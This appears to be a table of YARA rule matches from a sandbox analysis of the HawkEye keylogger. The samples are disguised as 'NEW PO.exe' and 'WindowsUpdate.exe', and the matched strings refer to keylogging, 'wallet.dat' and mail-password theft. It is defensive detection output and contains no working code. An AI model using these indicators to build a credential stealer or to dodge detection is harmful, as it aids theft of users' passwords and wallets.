7.2.NEW PO.exe.408208.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.408208.9.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
16.0.WindowsUpdate.exe.408208.9.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.408208.9.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.408208.9.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.408208.9.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.408208.9.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.42d9930.45.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.24.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.0.NEW PO.exe.45fa72.24.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.24.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.45fa72.24.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
23.0.vbc.exe.400000.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.28.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.0.NEW PO.exe.408208.28.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.408208.28.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.28.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.408208.28.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.28.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
22.0.vbc.exe.400000.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.22.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.409c0d.14.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
16.0.WindowsUpdate.exe.409c0d.14.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.409c0d.14.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.409c0d.14.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.409c0d.14.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.400000.6.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.6.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.6.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.6.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.6.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.6.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
7.2.NEW PO.exe.45fa72.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.2.NEW PO.exe.45fa72.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.2.NEW PO.exe.45fa72.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.2.NEW PO.exe.45fa72.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
18.2.WindowsUpdate.exe.42f2370.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.3ac2370.34.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.45fa72.8.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
16.0.WindowsUpdate.exe.45fa72.8.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.45fa72.8.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.45fa72.8.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
23.0.vbc.exe.400000.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
23.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.42d9930.45.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.42d9930.45.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.2d9bffc.33.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.409c0d.18.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.409c0d.18.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.409c0d.18.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.409c0d.18.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.18.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.8660000.36.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.24.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
18.0.WindowsUpdate.exe.408208.24.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.24.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.24.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.408208.24.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.408208.24.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.400000.37.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.37.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.37.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.37.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.37.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.37.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.42f2370.34.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
22.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.27.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.409c0d.27.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.409c0d.27.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.409c0d.27.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.27.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.408208.13.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
16.0.WindowsUpdate.exe.408208.13.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.408208.13.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.408208.13.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.408208.13.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.408208.13.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.400000.21.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.21.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.21.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.21.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.21.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.21.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.408208.28.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
18.0.WindowsUpdate.exe.408208.28.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.28.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.28.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.408208.28.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.408208.28.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
